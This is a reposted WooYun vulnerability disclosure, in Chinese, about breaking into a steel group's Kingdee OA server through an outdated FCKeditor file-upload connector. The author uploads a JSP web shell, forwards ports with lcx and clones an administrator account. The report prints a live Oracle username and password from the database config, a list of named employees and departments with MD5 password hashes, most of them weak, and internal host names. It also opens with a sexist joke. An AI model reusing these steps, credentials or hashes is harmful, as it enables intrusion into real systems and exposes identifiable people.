攀枝花钢城集团某服务器内网渗透

2017年4月29日13:13:26评论521 views字数 235阅读0分47秒阅读模式

摘要

2016-04-26：细节已通知厂商并且等待厂商处理中
2016-04-28：厂商已经确认，细节仅向厂商公开
2016-05-08：细节向核心白帽子及相关领域专家公开
2016-05-18：细节向普通白帽子公开
2016-05-28：细节向实习白帽子公开
2016-06-12：细节向公众公开

漏洞概要关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-200602

漏洞标题：攀枝花钢城集团某服务器内网渗透

漏洞作者：路人甲

提交时间： 2016-04-26 00:10

公开时间： 2016-06-12 18:20

漏洞类型：成功的入侵事件

危害等级：高

自评Rank： 20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：任意文件上传任意文件上传

1人收藏

漏洞详情

披露状态：

简要描述：

男女之间相处，男人要处处让着女人。就拿我来说，我做任何事就都让着女朋友，比如让她洗衣服，让她做饭，让她刷碗，让她收拾屋子……

详细说明：

攀枝花钢城集团办公协同系统（OA）使用了低版本的金蝶OA

OA地址： **.**.**.**:7890/oa/themes/mskin/login/login.jsp

该系统使用了低版本FCKeditor，可上传任意文件

**.**.**.**:7890/oa/components/fck/editor/filemanager/browser/default/browser.html?Connector=**.**.**.**:7890/oa/components/fck/editor/filemanager/browser/default/connectors/jsp/connector

漏洞证明：

上传shell： 2.jsp

找到数据库配置文件

code 区域

<Resource name="jdbc/DefaultDS" auth="Container" type="javax.sql.DataSource"
                maxActive="100" maxIdle="20" maxWait="10000" initialSize="10" minIdle="10"
                removeAbandoned="true" removeAbandonedTimeout="60" logAbandoned="true"
                username="oadb" password="gcjtoa" driverClassName="oracle.jdbc.OracleDriver"
                url="jdbc:oracle:thin:@//**.**.**.**:1521/oradata"/>

Oracle的数据库

管理员权限

只有一个网口，且ip显示是内网。应该是交换机使用了NAT Server服务，将内网80端口映射到公网的7890端口

上传lcx作端口转发

修改注册表，克隆管理员用户

OA用户

共有1443个用户

举例

code 区域

欣宇化工技术研发中心 670b14728ad9902aecba32e22fa4f6bd
 李洋 202cb962ac59075b964b07152d234b70
 欣宇化工海绵钛运行中心 670b14728ad9902aecba32e22fa4f6bd
 黄平安 202cb962ac59075b964b07152d234b70
 瑞矿政工部 670b14728ad9902aecba32e22fa4f6bd
 瑞矿保卫科 8aec51422b30d61bce078b27f0babeb1
 瑞矿综合办公室 202cb962ac59075b964b07152d234b70
 付成勇 670b14728ad9902aecba32e22fa4f6bd
 邱军 202cb962ac59075b964b07152d234b70
 任兵 b96946657983c67d690243a42dde4bfe
 综合财务部 e99a18c428cb38d5f260853678922e03
 综合技术质量部 1b18918b3565fc7ee82291beb1ddb7b7
 综合供销部 202cb962ac59075b964b07152d234b70
 综合经销部 202cb962ac59075b964b07152d234b70
 天洁物业 6364d9d3f59aa53792fa62e5f161ca8a
 绿源劳资科 202cb962ac59075b964b07152d234b70
 谢永强 670b14728ad9902aecba32e22fa4f6bd
 阳鑫办公室 a0260f8b9817d316b32783dd9e644d01
 阳鑫财务科 ba311493f529374f0c33b5e9433574d7
 瑞天政工（人事）部 670b14728ad9902aecba32e22fa4f6bd
 瑞泰电修分厂 202cb962ac59075b964b07152d234b70
 攀鑫财务科 202cb962ac59075b964b07152d234b70
 瑞通节能服务事业部 670b14728ad9902aecba32e22fa4f6bd

瑞天政工（人事）部

瑞通西昌运营事业部

绿源综合管理部

贸易公司财务科

东西太多了~这里我就不贴数据了。。。。

可进行内网渗透

code 区域

C:/Documents and Settings/Administrator>net view
 服务器名称            注释
 
 ---------------------------------------------------------------------
 //GCJT-08361BB1B9
 //GQSVR-IMTS
 //GQSVR-MTS
 //HRSRV
 //NC1
 //OASERVER
 //VM01
 //WEB-INTERNAT
 //WIN-8AGEFMEVINN
 //WIN-M2GM273EOU0
 //YCGS-56F26EED9D
 命令成功完成。

修复方案：

一只充满好奇心的白帽纸，绝无恶意

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-04-28 18:10

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT向能源行业信息化主管部门通报,由其后续协调网站管理单位处置.

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-26 00:29 | sqlfeng ( 普通白帽子 | Rank:721 漏洞数:86 | 江山父老能容我,不使人间造孽钱)

0

不说了，我去洗衣服，做饭，刷碗，收拾屋子了

1# 回复此人

漏洞概要 关注数(10) 关注此漏洞

缺陷编号： WooYun-2016-200602

漏洞标题： 攀枝花钢城集团某服务器内网渗透

相关厂商： 攀枝花钢城集团

漏洞作者： 路人甲

提交时间： 2016-04-26 00:10

公开时间： 2016-06-12 18:20

漏洞类型： 成功的入侵事件

危害等级： 高

自评Rank： 20

漏洞状态： 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 任意文件上传 任意文件上传

1人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

漏洞评价(共0人评价): 登陆后才能进行评分

评价

发表评论

在线咨询

微信

漏洞概要关注数(10) 关注此漏洞

漏洞标题：攀枝花钢城集团某服务器内网渗透

相关厂商：攀枝花钢城集团

漏洞作者：路人甲

漏洞类型：成功的入侵事件

危害等级：高

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签：任意文件上传任意文件上传

版权声明：转载请注明来源路人甲@乌云

漏洞评价(共0人评价):

登陆后才能进行评分